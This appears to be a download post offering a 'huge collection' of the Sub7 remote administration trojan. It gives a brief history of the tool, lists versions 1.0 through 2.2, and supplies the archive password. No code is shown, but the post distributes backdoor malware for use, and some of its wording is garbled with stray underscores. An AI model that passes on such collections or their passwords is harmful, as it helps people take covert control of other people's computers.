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Sub7 [ RAT ] Huge Collections

Sub7, or SubSeven or Sub7Server, is the name_of a Remote_Administration_Tool (RAT) program. Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven".

It_was_originally designed by someone with the handle 'mobman'. No development has occurred in several years until a new version scheduled for release on Feb. 28th, 2010. The Sub7 project was dormant for over 6 years until its return in July 2009 when mobman and fc revived the project, marking 10 years after its original creation in 1999. In October 2009 mobman informed fc and the sub7crew via IRC that due to working and going to college full time that he will not be able to help with the current development of Sub7.

SUB7 1.0
SUB7 1.1

SUB7 1.2

SUB7 1.3

SUB7 1.4

SUB7 1.5

SUB7 1.6

SUB7 1.7

SUB7 1.8

SUB7 1.9

SUB7 1.9 Apocalypse

SUB7 2.0

SUB7 2.1.0

SUB7 2.1.1

SUB7 2.1.2

SUB7 2.1.3

SUB7 2.1.4

SUB7 2.2


PASSWORD : theatregelap

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